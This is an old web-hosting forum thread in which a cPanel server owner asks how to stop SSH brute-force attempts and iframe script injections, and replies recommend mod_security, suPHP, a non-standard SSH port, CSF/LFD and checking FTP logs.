Recently I have noticed that my server is constantly "under attack".

Brute force protection notifies me every day about a dozen of attempted logins to various users, including root. Like this:


Also, few days ago i got injected with scripts on few sites, some of my own, some of my clients. Scripts are same in basic, but they differ from site to site.

Few examples:


or:



I want to prevent this from happening in future. How do I do that?

I have cPanel 11.24.5-S37946 - WHM 11.24.2 - X 3.9; REDHAT Enterprise 5.2 i686 standard.
Installed APF, chkroot, rk hunter, used almost all server tweaking as instructed here:
http://forums.theplanet.com/index.php?showtopic=69663
(except disable root login and enabling SuExec)

I would appreciate your help. Thank you.

Most of the time you end up with iframe injections because of scripts on your server being exploited. All too often I come across compromised servers that had an old forgotten squirrelmail install, or an unkept version of Joomla, etc... pre-made scripts are not solely responsible, often custom code can be exploited as well. So to answer your question, there really is no good way to prevent this.

Many people suggest mod_security, with a good ruleset it can be very helpful. The down side is it can be restrictive to your users.

I personally like suPHP. Essentially a users php scripts are executed as the user him/her self. If a users code is compromised, and your permissions are setup properly, you can limit the damage to the one compromised users data. Unfortunately many times the permissions in the rest of the user directories is not correct... eg: random directories read/writable to the world. Another advantage of suPHP is that the malicious files you find will be owned by the compromised user. In other words, you know which site to suspend fairly quickly.

Sorry I couldn't be of more help, but it is difficult to advise you on how to proceed without investigating it personally. Good luck, and if you have any more direct questions we can help you with, please let us know.

Also, change your sshd port from the default port(22) to something non standard. That will help you avoid those annoying sshd password crackers.

Don't forget to update your orbit password notes with the new sshd port

I have just activated mod_security. Are there some premade rulesets for it? I am not familiar with it so much...




Is there "a tutorial" on how to activate this? I have tried this couple of times and it never worked. I would like to have it installed since it would greatly help my users and in my work...

In regard with your help, James you are simply great! Thank you very much!

also, where do I update ssh port information? I was looking for it in Orbit2 but no luck...

ModSec Rules:
http://www.gotroot.com/tiki-index.php?page..._security+rules

Also I would suggest using CSF/LFD on top of changing your default SSH listen port. Login Failure Daemon (lfd) will monitor failed attempts at root and once a threshold is exceeded the IP address will be blocked for a certain amount of time. More information and the download can be found here:
http://www.configserver.com/cp/csf.html

*EDIT*
In Orbit2 you will go to the hardware device that you have changed the SSH port on. Hardware->(Server you have changed)->Passwords->Change. When you select change there is a Detail field where you can specify a port. I.E. you would change "System" to "System port 6493".

I have been searching TP for a HowTo for CSF and can't find one. I was able to install CSF, but although I thought I had a standard server, the security check seems to think as many things are wrong as there are right.

I would like a way to know what of the security issues can be ignored and which ones should be taken care of.

I am hoping there is a list somewhere on configuring CSF for a TP version of cPanel.

Thanks!

If you check cpanel forum, there is a thread on how to install csf in cpanel.

Something important to check that no one mention is to check the ftp logs, most of the times this days you get inyected because of some adaware or malware that injects yours or your clients computer and uses the ftp login to login and inject the files.

Probably a good idea to check too and check the account passwords affected.

Hello,

I have looked on the cPanel forum twice, and even though the author is a moderator there, I have yet to be able to find help on all the security issues it raises. I want some assurance that if the security check says I need to do something, that I have done the changes that are needed but no doing some that I shouldn't be doing.

BTW, I have actually been to Uruguay, but only briefly..

Lew

Lew, most of csf warnings are fine in almost 99% of the situations. We have testes it in more than a few hundred servers without any issues.

If you have a question in any of the warnings just let me know.

Well, next time drop me a email and we can go and have a beer somewhere

When I run the security check, there are as many warnings as ones saying things are OK. Not knowing better, I don't know which warnings are unimportant vs. ones I should make a change on the server for.

I was amazed at how many old cars (20s and 30s) there were there...all over the streets...was like going to a museum.

Lew